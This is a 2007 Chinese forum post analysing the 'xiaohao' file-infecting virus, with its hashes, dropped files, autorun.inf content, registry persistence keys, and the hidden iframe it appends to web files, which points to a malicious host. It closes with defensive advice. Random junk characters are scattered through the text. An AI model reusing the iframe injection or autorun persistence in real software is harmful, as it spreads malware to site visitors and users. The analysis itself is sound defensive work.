|
|
File: C:\Documents and Settings\Administrator\桌面\xiaohao.exe; a% I- |! m2 m% o8 ~! f
Size: 12288 bytes
" _, \9 D- j5 Y% i8 f7 ?& sFile Version: 1, 0, 0, 1
9 a. U# M$ h) bModified: 2007年8月14日, 21:03:226 Z+ `. Q+ K9 ^" q
MD5: B50ED06B61CDCF060D0136784999E50C
4 ?% \5 r8 g9 m0 l e" J* w% zSHA1: ADFE561A7E12E6123C2E5E64EAE2308CBD4A79FD
! F4 Z1 G: _( X. i' \" A- D# v$ jCRC32: 5CC1E47A
) {& g8 V, S# ~ b1 G3 ]加壳方式:UPX ; h4 U# R2 |: A. o" z# h+ g7 n
病毒运行后:
3 F+ p4 `4 m( F" o1.生成如下文件:" c5 _* n- C0 [% V. B3 ^* d
%SystemRoot%\system32\exloroe.exe i) R4 U" |; B& b& C' B, A! M
每个分区下生成一个xiaohao.exe 和autorun.inf6 R% @6 e0 f6 r8 I2 K( z ]: U3 ^
autorun.inf内容2 Q$ o. P, P* ?6 [
[Autorun]! Z6 ]2 G, ~# _6 o; T/ c; c3 V
open=Xiaohao.exe
* p0 v1 b- P6 lshellexecute=Xiaohao.exe. ]$ o0 V+ s! @' [' e9 W: T1 ~
shell\Auto\command=Xiaohao.exe( P% ^5 o/ C& c4 o8 R9 F9 F+ w
2.添加注册表项目( r) c. f a; c% s% ?3 L
HKLM\SOFTWARE\Microsoft\Active Setup\Installed Components\{H9I12RB03-AB-B70-7-11d2-9CBD-0O00FS7AH6-9E2121BHJLK}
1 o5 c# E8 M% x6 u指向 %SystemRoot%\system32\exloroe.exe达到开机启动目的! b- P: |0 p/ f* {; u! g
3.修改注册表键值HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL\CheckedValue为0x00000000
3 b, }2 \1 {, X" \; ^ i }# a破坏显示隐藏文件1 ^/ H0 v7 q1 z6 X- J
删除HKU\Software\Microsoft\Windows\CurrentVersion\Explorer\MenuOrder\Start Menu2
4 o# r. E- C! l$ P8 t9 G) }从而删除开始菜单中所有的快捷方式$ d" T$ B! J1 u) m
4.感染文件& o3 A' R& X% f# O/ V
从系统盘开始 查找所有*.exe的文件 将自身病毒体写入到正常文件中,被感染后的文件图标为一个表示有“浩”字的图标,病毒采取覆盖感染的方式,被感染的
" a9 W( ?: A' O3 n, G3 _exe无法修复
8 X# m# q& r; ]! ~从系统盘开始 查找所有*.jsp、*.php、*.aspx、*.asp、*.html、*.htm 在其尾部加入代码
9 H3 Y6 k2 I8 Z- n<iframe src=http://xiaohao.yona.biz/xiaohao.htm width=0 height=0></iframe>6 b4 i1 s. O; A+ A2 L
所有感染的文件的文件名记录在C:\Jilu.txt里面, }# A; o/ J! J( |4 s( O; r
并将所有未能感染的文件属性变为隐藏6 Z9 ^! S+ i2 ]! \/ W _& o
5.病毒运行时,所有窗口标题变为“已中毒,X14o-H4o's Virus”! q4 i/ J) O: y3 H
6.系统时间改为2005年1月17日* `, q1 N0 P! S, t0 n& p! c5 ^
病毒作者将其QQ号码和博客公布于互联网上,以此炫耀自己的技术。作者的行为和原先的兔子病毒很相像,为了炫耀。5 T5 v8 `6 B2 p6 Z' X$ g6 I
由于病毒感染所有exe文件 所以重启以后可能会造成ntoskrnl.exe,ntkrnlpa.exe等核心启动文件被修改从而造成系统启动失败
7 e+ b- z+ x! }( n4 `+ {如果中了此类病毒 那么几乎等于判了死刑 必须重装系统 而且要将其他盘里面所有的*.exe,*.jsp、*.php、*.aspx、*.asp、*.html、*.htm 文件删掉" f: g3 P0 O- S! b: y
希望大家注意如下几点防范此类病毒+ T% l9 b; |4 q- \9 M( ^
1.安装还原精灵、冰点还原、雨过天晴等还原软件(没装还软软件的参考下两条)
; Y: i" _3 j9 b! o2.及时升级杀毒软件,防火墙,一定打全系统补丁: E" u$ B) P7 W5 Z, e# i
3.禁用U盘等移动设备的自动播放功能:在“开始”菜单的“运行”框中运行“gpedit.msc”命令,在“组策略”找到“计算机配置”和“用户配置”下的“管理模板”功能,打开其中的“系统”菜单中的“关闭自动播放”的设置,在其属性里面选择“已启用”,接着选择“所有驱动器”,最后确定保存即可 |
|
IP卡
狗仔卡
发表于 2007-9-16 09:33:42
提升卡
置顶卡
沉默卡
喧嚣卡
变色卡
千斤顶
显身卡
楼主